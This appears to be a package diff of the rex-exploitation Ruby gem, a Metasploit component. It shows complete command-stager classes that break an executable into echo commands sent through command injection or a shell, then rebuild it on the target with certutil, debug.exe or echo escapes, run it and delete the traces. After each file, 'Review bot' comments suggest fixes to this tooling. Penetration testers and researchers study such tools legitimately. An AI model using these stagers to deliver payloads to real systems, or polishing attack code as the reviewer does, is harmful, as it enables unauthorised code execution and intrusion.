rex-exploitation 0.1.0

  1. checksums.yaml +7 -0
  2. checksums.yaml.gz.sig +0 -0
  3. data.tar.gz.sig +1 -0
  4. data/.gitignore +9 -0
  5. data/.rspec +2 -0
  6. data/.travis.yml +5 -0
  7. data/CODE_OF_CONDUCT.md +74 -0
  8. data/Gemfile +4 -0
  9. data/README.md +33 -0
  10. data/Rakefile +6 -0
  11. data/bin/console +14 -0
  12. data/bin/setup +8 -0
  13. data/data/exploits/cmdstager/debug_asm +91 -0
  14. data/data/exploits/cmdstager/debug_write +819 -0
  15. data/data/exploits/cmdstager/vbs_b64 +40 -0
  16. data/data/exploits/cmdstager/vbs_b64_adodb +50 -0
  17. data/data/exploits/cmdstager/vbs_b64_noquot +49 -0
  18. data/data/exploits/cmdstager/vbs_b64_sleep +41 -0
  19. data/data/js/detect/ie_addons.js +89 -0
  20. data/data/js/detect/misc_addons.js +157 -0
  21. data/data/js/detect/os.js +831 -0
  22. data/data/js/memory/explib2/lib/explib2.js +426 -0
  23. data/data/js/memory/explib2/payload/drop_exec.js +33 -0
  24. data/data/js/memory/explib2/payload/exec.js +10 -0
  25. data/data/js/memory/heap_spray.js +17 -0
  26. data/data/js/memory/heaplib2.js +192 -0
  27. data/data/js/memory/mstime_malloc.js +31 -0
  28. data/data/js/memory/property_spray.js +38 -0
  29. data/data/js/network/ajax_download.js +18 -0
  30. data/data/js/network/ajax_post.js +18 -0
  31. data/data/js/network/xhr_shim.js +15 -0
  32. data/data/js/utils/base64.js +126 -0
  33. data/data/ropdb/flash.xml +80 -0
  34. data/data/ropdb/hxds.xml +66 -0
  35. data/data/ropdb/java.xml +33 -0
  36. data/data/ropdb/msvcrt.xml +71 -0
  37. data/data/ropdb/reader.xml +132 -0
  38. data/data/ropdb/samba.xml +436 -0
  39. data/data/ropdb/stagefright.xml +225 -0
  40. data/lib/rex/exploitation.rb +7 -0
  41. data/lib/rex/exploitation/cmdstager.rb +11 -0
  42. data/lib/rex/exploitation/cmdstager/base.rb +189 -0
  43. data/lib/rex/exploitation/cmdstager/bourne.rb +118 -0
  44. data/lib/rex/exploitation/cmdstager/certutil.rb +114 -0
  45. data/lib/rex/exploitation/cmdstager/debug_asm.rb +139 -0
  46. data/lib/rex/exploitation/cmdstager/debug_write.rb +133 -0
  47. data/lib/rex/exploitation/cmdstager/echo.rb +166 -0
  48. data/lib/rex/exploitation/cmdstager/printf.rb +121 -0
  49. data/lib/rex/exploitation/cmdstager/tftp.rb +70 -0
  50. data/lib/rex/exploitation/cmdstager/vbs.rb +125 -0
  51. data/lib/rex/exploitation/egghunter.rb +423 -0
  52. data/lib/rex/exploitation/encryptjs.rb +79 -0
  53. data/lib/rex/exploitation/heaplib.js.b64 +331 -0
  54. data/lib/rex/exploitation/heaplib.rb +107 -0
  55. data/lib/rex/exploitation/js.rb +6 -0
  56. data/lib/rex/exploitation/js/detect.rb +70 -0
  57. data/lib/rex/exploitation/js/memory.rb +80 -0
  58. data/lib/rex/exploitation/js/network.rb +83 -0
  59. data/lib/rex/exploitation/js/utils.rb +32 -0
  60. data/lib/rex/exploitation/jsobfu.rb +17 -0
  61. data/lib/rex/exploitation/obfuscatejs.rb +336 -0
  62. data/lib/rex/exploitation/omelet.rb +321 -0
  63. data/lib/rex/exploitation/opcodedb.rb +819 -0
  64. data/lib/rex/exploitation/ropdb.rb +190 -0
  65. data/lib/rex/exploitation/seh.rb +93 -0
  66. data/lib/rex/exploitation/version.rb +5 -0
  67. data/rex-exploitation.gemspec +35 -0
  68. metadata +298 -0
  69. metadata.gz.sig +0 -0
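--- a/data/lib/rex/exploitation/cmdstager/certutil.rb
+++ b/data/lib/rex/exploitation/cmdstager/certutil.rb
@@ -0,0 +1,114 @@
+# -*- coding: binary -*-
+
+require 'rex/text'
+require 'rex/arch'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides the ability to create a sequence of commands from an executable.
+# When this sequence is ran via command injection or a shell, the resulting exe will
+# be written to disk and executed.
+#
+# This particular version uses Windows certutil to base64 decode a file,
+# created via echo >>, and decode it to the final binary.
+#
+#
+# Written by xistence
+# Original discovery by @mattifestation - https://gist.github.com/mattifestation/47f9e8a431f96a266522
+#
+###
+
+class CmdStagerCertutil < CmdStagerBase
+
+def initialize(exe)
+super
+
+@var_encoded = Rex::Text.rand_text_alpha(5)
+@var_decoded = Rex::Text.rand_text_alpha(5)
+@decoder = nil # filled in later
+end
+
+
+# Override just to set the extra byte count
+# @param opts [Array] The options to generate the command line
+# @return [Array] The complete command line
+def generate_cmds(opts)
+# Set the start/end of the commands here (vs initialize) so we have @tempdir
+@cmd_start = "echo "
+@cmd_end = ">>#{@tempdir}#{@var_encoded}.b64"
+xtra_len = @cmd_start.length + @cmd_end.length + 1
+opts.merge!({ :extra => xtra_len })
+super
+end
+
+
+# Simple base64 encoder for the executable
+# @param opts [Array] The options to generate the command line
+# @return [String] Base64 encoded executable
+def encode_payload(opts)
+Rex::Text.encode_base64(@exe)
+end
+
+
+# Combine the parts of the encoded file with the stuff that goes
+# before / after it.
+# @param parts [Array] Splitted commands
+# @param opts [Array] The options to generate the command line
+# @return [Array] The command line
+def parts_to_commands(parts, opts)
+
+cmds = []
+parts.each do |p|
+cmd = ''
+cmd << @cmd_start
+cmd << p
+cmd << @cmd_end
+cmds << cmd
+end
+
+cmds
+end
+
+
+# Generate the commands that will decode the file we just created
+# @param opts [Array] The options to generate the command line
+# @return [Array] The certutil Base64 decoder part of the command line
+def generate_cmds_decoder(opts)
+
+cmds = []
+cmds << "certutil -decode #{@tempdir}#{@var_encoded}.b64 #{@tempdir}#{@var_decoded}.exe"
+return cmds
+end
+
+
+# We override compress commands just to stick in a few extra commands
+# last second..
+# @param cmds [Array] Complete command line
+# @param opts [Array] Extra options for command line generation
+# @return [Array] The complete command line including cleanup
+def compress_commands(cmds, opts)
+# Make it all happen
+cmds << "#{@tempdir}#{@var_decoded}.exe"
+
+# Clean up after unless requested not to..
+if (not opts[:nodelete])
+cmds << "del #{@tempdir}#{@var_encoded}.b64"
+# NOTE: We won't be able to delete the exe while it's in use.
+end
+
+super
+end
+
+# Windows uses & to concat strings
+#
+# @return [String] Concat operator
+def cmd_concat_operator
+" & "
+end
+
+end
+end
+end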
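Review bot: The YARD tags on generate_cmds, encode_payload, parts_to_commands, generate_cmds_decoder and compress_commands declare `opts` as `[Array]`, but the bodies call `opts.merge!` and read `opts[:nodelete]`, so it is a Hash and the tags should read `@param opts [Hash] The options to generate the command line`. `@decoder = nil # filled in later` in initialize is never read in this file (the debug_asm.rb and debug_write.rb hunks fill theirs from `opts[:decoder]`), so unless CmdStagerBase uses it, either the assignment or its comment is stale. In generate_cmds_decoder the `cmds = []` / `<<` / `return cmds` sequence can be the single expression `["certutil -decode #{@tempdir}#{@var_encoded}.b64 #{@tempdir}#{@var_decoded}.exe"]`, and `if (not opts[:nodelete])` in compress_commands reads better as `unless opts[:nodelete]`; the same `not` form appears in the debug_asm.rb and debug_write.rb hunks.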
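--- a/data/lib/rex/exploitation/cmdstager/debug_asm.rb
+++ b/data/lib/rex/exploitation/cmdstager/debug_asm.rb
@@ -0,0 +1,139 @@
+# -*- coding: binary -*-
+
+require 'rex/text'
+require 'rex/arch'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides the ability to create a sequence of commands from an executable.
+# When this sequence is ran via command injection or a shell, the resulting exe will
+# be written to disk and executed.
+#
+# This particular version uses debug.exe to assemble a small COM file. The COM will
+# take a hex-ascii file, created via echo >>, and decode it to the final binary.
+#
+# Requires: debug.exe
+#
+# Written by Joshua J. Drake
+#
+###
+
+class CmdStagerDebugAsm < CmdStagerBase
+
+def initialize(exe)
+super
+
+@var_decoder_asm = Rex::Text.rand_text_alpha(8) + ".dat"
+@var_decoder_com = Rex::Text.rand_text_alpha(8) + ".com"
+@var_payload_in = Rex::Text.rand_text_alpha(8) + ".dat"
+@var_payload_out = Rex::Text.rand_text_alpha(8) + ".exe"
+@decoder = nil # filled in later
+end
+
+
+#
+# Override just to set the extra byte count
+#
+def generate_cmds(opts)
+# Set the start/end of the commands here (vs initialize) so we have @tempdir
+@cmd_start = "echo "
+@cmd_end = ">>#{@tempdir}#{@var_payload_in}"
+xtra_len = @cmd_start.length + @cmd_end.length + 1
+opts.merge!({ :extra => xtra_len })
+super
+end
+
+
+#
+# Simple hex encoding...
+#
+def encode_payload(opts)
+ret = @exe.unpack('H*')[0]
+end
+
+
+#
+# Combine the parts of the encoded file with the stuff that goes
+# before / after it.
+#
+def parts_to_commands(parts, opts)
+
+cmds = []
+parts.each do |p|
+cmd = ''
+cmd << @cmd_start
+cmd << p
+cmd << @cmd_end
+cmds << cmd
+end
+
+cmds
+end
+
+
+#
+# Generate the commands that will decode the file we just created
+#
+def generate_cmds_decoder(opts)
+
+# Allow decoder stub override (needs to input base64 and output bin)
+@decoder = opts[:decoder] if (opts[:decoder])
+
+# Read the decoder data file
+f = File.new(@decoder, "rb")
+decoder = f.read(f.stat.size)
+f.close
+
+# Replace variables
+decoder.gsub!(/decoder_stub/, "#{@tempdir}#{@var_decoder_asm}")
+decoder.gsub!(/h2b\.com/, "#{@tempdir}#{@var_decoder_com}")
+# NOTE: these two filenames MUST 8+3 chars long.
+decoder.gsub!(/testfile\.dat/, "#{@var_payload_in}")
+decoder.gsub!(/testfile\.out/, "#{@var_payload_out}")
+
+# Split it apart by the lines
+decoder.split("\n")
+end
+
+
+#
+# We override compress commands just to stick in a few extra commands
+# last second..
+#
+def compress_commands(cmds, opts)
+# Convert the debug script to an executable...
+cvt_cmd = ''
+if (@tempdir != '')
+cvt_cmd << "cd %TEMP% && "
+end
+cvt_cmd << "debug < #{@tempdir}#{@var_decoder_asm}"
+cmds << cvt_cmd
+
+# Convert the encoded payload...
+cmds << "#{@tempdir}#{@var_decoder_com}"
+
+# Make it all happen
+cmds << "start #{@tempdir}#{@var_payload_out}"
+
+# Clean up after unless requested not to..
+if (not opts[:nodelete])
+cmds << "del #{@tempdir}#{@var_decoder_asm}"
+cmds << "del #{@tempdir}#{@var_decoder_com}"
+cmds << "del #{@tempdir}#{@var_payload_in}"
+# XXX: We won't be able to delete the payload while it is running..
+end
+
+super
+end
+
+# Windows uses & to concat strings
+def cmd_concat_operator
+" & "
+end
+
+end
+end
+end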
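Review bot: generate_cmds_decoder opens the stub with `File.new(@decoder, "rb")` and closes it by hand, so an exception from `read` leaks the handle, and when `opts[:decoder]` is absent `@decoder` is still the `nil` set in initialize (unless CmdStagerBase assigns it, which is not visible here), so `File.new` fails with a TypeError instead of a message naming the missing option; `raise ArgumentError, "decoder stub path (opts[:decoder]) is required" unless @decoder` followed by `decoder = File.binread(@decoder)` covers both. The comment on that line, `needs to input base64 and output bin`, contradicts encode_payload, which emits hex via `unpack('H*')` — presumably copied from a base64 stager; the same comment and the same File.new pattern recur in the debug_write.rb hunk. Separately, `ret = @exe.unpack('H*')[0]` in encode_payload assigns a local that is never read; the bare expression `@exe.unpack('H*')[0]` is enough.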
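--- a/data/lib/rex/exploitation/cmdstager/debug_write.rb
+++ b/data/lib/rex/exploitation/cmdstager/debug_write.rb
@@ -0,0 +1,133 @@
+# -*- coding: binary -*-
+
+require 'rex/text'
+require 'rex/arch'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides the ability to create a sequence of commands from an executable.
+# When this sequence is ran via command injection or a shell, the resulting exe will
+# be written to disk and executed.
+#
+# This particular version uses debug.exe to write a small .NET binary. That binary will
+# take a hex-ascii file, created via echo >>, and decode it to the final binary.
+#
+# Requires: .NET, debug.exe
+#
+###
+
+class CmdStagerDebugWrite < CmdStagerBase
+
+def initialize(exe)
+super
+
+@var_bypass = Rex::Text.rand_text_alpha(8)
+@var_payload = Rex::Text.rand_text_alpha(8)
+@decoder = nil # filled in later
+end
+
+
+#
+# Override just to set the extra byte count
+#
+def generate_cmds(opts)
+# Set the start/end of the commands here (vs initialize) so we have @tempdir
+@cmd_start = "echo "
+@cmd_end = ">>#{@tempdir}#{@var_payload}"
+xtra_len = @cmd_start.length + @cmd_end.length + 1
+opts.merge!({ :extra => xtra_len })
+super
+end
+
+
+#
+# Simple hex encoding...
+#
+def encode_payload(opts)
+@exe.unpack('H*')[0]
+end
+
+
+#
+# Combine the parts of the encoded file with the stuff that goes
+# before / after it.
+#
+def parts_to_commands(parts, opts)
+
+cmds = []
+parts.each do |p|
+cmd = ''
+cmd << @cmd_start
+cmd << p
+cmd << @cmd_end
+cmds << cmd
+end
+
+cmds
+end
+
+
+#
+# Generate the commands that will decode the file we just created
+#
+def generate_cmds_decoder(opts)
+
+# Allow decoder stub override (needs to input base64 and output bin)
+@decoder = opts[:decoder] if (opts[:decoder])
+
+# Read the decoder data file
+f = File.new(@decoder, "rb")
+decoder = f.read(f.stat.size)
+f.close
+
+# Replace variables
+decoder.gsub!(/decoder_stub/, "#{@tempdir}#{@var_bypass}")
+
+# Split it apart by the lines
+decoder.split("\n")
+end
+
+
+#
+# We override compress commands just to stick in a few extra commands
+# last second..
+#
+def compress_commands(cmds, opts)
+# Convert the debug script to an executable...
+cvt_cmd = ''
+if (@tempdir != '')
+cvt_cmd << "cd %TEMP% && "
+end
+cvt_cmd << "debug < #{@tempdir}#{@var_bypass}"
+cmds << cvt_cmd
+
+# Rename the resulting binary
+cmds << "move #{@tempdir}#{@var_bypass}.bin #{@tempdir}#{@var_bypass}.exe"
+
+# Converting the encoded payload...
+cmds << "#{@tempdir}#{@var_bypass}.exe #{@tempdir}#{@var_payload}"
+
+# Make it all happen
+cmds << "start #{@tempdir}#{@var_payload}.exe"
+
+# Clean up after unless requested not to..
+if (not opts[:nodelete])
+cmds << "del #{@tempdir}#{@var_bypass}.exe"
+cmds << "del #{@tempdir}#{@var_payload}"
+# XXX: We won't be able to delete the payload while it is running..
+end
+
+super
+end
+
+# Windows uses & to concat strings
+def cmd_concat_operator
+" & "
+end
+
+end
+end
+end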
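Review bot: compress_commands hard-codes the `.bin` suffix in `move #{@tempdir}#{@var_bypass}.bin #{@tempdir}#{@var_bypass}.exe`, yet nothing in this class produces a file with that name — it presumably comes from the decoder stub under data/exploits/cmdstager/debug_write that generate_cmds_decoder patches through the `decoder_stub` substitution, so the coupling is invisible to a reader of this file. A comment above the move line such as `# The debug script (data/exploits/cmdstager/debug_write) emits <decoder_stub>.bin; keep this suffix in sync with it` would document the dependency. The override methods also carry only bare `#` headers, whereas the certutil.rb hunk documents the same overrides with `@param`/`@return` tags; the debug_asm.rb hunk has the same gap.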
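--- a/data/lib/rex/exploitation/cmdstager/echo.rb
+++ b/data/lib/rex/exploitation/cmdstager/echo.rb
@@ -0,0 +1,166 @@
+# -*- coding: binary -*-
+
+require 'rex/text'
+require 'rex/arch'
+require 'shellwords'
+
+module Rex
+module Exploitation
+
+class CmdStagerEcho < CmdStagerBase
+
+ENCODINGS = {
+'hex' => "\\\\x",
+'octal' => "\\\\"
+}
+
+def initialize(exe)
+super
+
+@var_elf = Rex::Text.rand_text_alpha(5)
+end
+
+#
+# Override to ensure opts[:temp] is a correct *nix path
+# and initialize opts[:enc_format].
+#
+def generate(opts = {})
+opts[:temp] = opts[:temp] || '/tmp/'
+
+unless opts[:temp].empty?
+opts[:temp].gsub!(/\\/, '/')
+opts[:temp] = opts[:temp].shellescape
+opts[:temp] << '/' if opts[:temp][-1,1] != '/'
+end
+
+# by default use the 'hex' encoding
+opts[:enc_format] = opts[:enc_format].nil? ? 'hex' : opts[:enc_format].to_s
+
+unless ENCODINGS.keys.include?(opts[:enc_format])
+raise RuntimeError, "CmdStagerEcho - Invalid Encoding Option: #{opts[:enc_format]}"
+end
+
+super
+end
+
+#
+# Override to set the extra byte count
+#
+def generate_cmds(opts)
+# Set the start/end of the commands here (vs initialize) so we have @tempdir
+@cmd_start = "echo "
+unless opts[:noargs]
+@cmd_start += "-en "
+end
+
+@cmd_end = ">>#{@tempdir}#{@var_elf}"
+xtra_len = @cmd_start.length + @cmd_end.length
+opts.merge!({ :extra => xtra_len })
+
+@prefix = opts[:prefix] || ENCODINGS[opts[:enc_format]]
+min_part_size = 5 # for both encodings
+
+if (opts[:linemax] - opts[:extra]) < min_part_size
+raise RuntimeError, "CmdStagerEcho - Not enough space for command - #{opts[:extra] + min_part_size} byte required, #{opts[:linemax]} byte available"
+end
+
+super
+end
+
+
+#
+# Encode into a format that echo understands, where
+# interpretation of backslash escapes are enabled. For
+# hex, it'll look like "\\x41\\x42", and octal will be
+# "\\101\\102\\5\\41"
+#
+def encode_payload(opts)
+case opts[:enc_format]
+when 'octal'
+return Rex::Text.to_octal(@exe, @prefix)
+else
+return Rex::Text.to_hex(@exe, @prefix)
+end
+end
+
+
+#
+# Combine the parts of the encoded file with the stuff that goes
+# before ("echo -en ") / after (">>file") it.
+#
+def parts_to_commands(parts, opts)
+parts.map do |p|
+cmd = ''
+cmd << @cmd_start
+cmd << p
+cmd << @cmd_end
+cmd
+end
+end
+
+#
+# Since the binary has been already dropped to fs, just execute and
+# delete it
+#
+def generate_cmds_decoder(opts)
+cmds = []
+# Make it all happen
+cmds << "chmod 777 #{@tempdir}#{@var_elf}"
+#cmds << "chmod +x #{@tempdir}#{@var_elf}"
+cmds << "#{@tempdir}#{@var_elf}#{' & echo' if opts[:background]}"
+
+# Clean up after unless requested not to..
+unless opts[:nodelete]
+cmds << "rm -f #{@tempdir}#{@var_elf}"
+end
+
+return cmds
+end
+
+#
+# Override it to ensure that the hex representation of a byte isn't cut
+#
+def slice_up_payload(encoded, opts)
+encoded_dup = encoded.dup
+
+parts = []
+xtra_len = opts[:extra]
+xtra_len ||= 0
+while (encoded_dup.length > 0)
+temp = encoded_dup.slice(0, (opts[:linemax] - xtra_len))
+# cut the end of the part until we reach the start
+# of a full byte representation "\\xYZ" or "\\YZX"
+temp = fix_last_byte(temp, opts, encoded_dup)
+parts << temp
+encoded_dup.slice!(0, temp.length)
+end
+
+parts
+end
+
+def fix_last_byte(part, opts, remaining="")
+fixed_part = part.dup
+
+case opts[:enc_format]
+when 'hex'
+while (fixed_part.length > 0 && fixed_part[-5, @prefix.length] != @prefix)
+fixed_part.chop!
+end
+when 'octal'
+if remaining.length > fixed_part.length and remaining[fixed_part.length, @prefix.length] != @prefix
+pos = fixed_part.rindex('\\')
+pos -= 1 if fixed_part[pos-1] == '\\'
+fixed_part.slice!(pos..fixed_part.length-1)
+end
+end
+
+return fixed_part
+end
+
+def cmd_concat_operator
+" ; "
+end
+
+end
+end
+end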
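Review bot: fix_last_byte's hex branch tests `fixed_part[-5, @prefix.length] != @prefix`, which assumes every encoded byte is exactly five characters, but generate_cmds lets the caller replace the prefix through `opts[:prefix]`, so any prefix not three characters long leaves each part cut inside a byte (with a two-character prefix the loop settles one character past a byte boundary, leaving a dangling backslash). Deriving the width from the prefix fixes it: `width = @prefix.length + 2` followed by `while (fixed_part.length > 0 && fixed_part[-width, @prefix.length] != @prefix)`; `min_part_size = 5 # for both encodings` in generate_cmds carries the same assumption and should be computed the same way. The octal branch joins its condition with `and` (`remaining.length > fixed_part.length and remaining[...] != @prefix`), which only works here because the condition contains no assignment; `&&` is the intended operator. `ENCODINGS` is also a mutable constant hash and should end with `.freeze`.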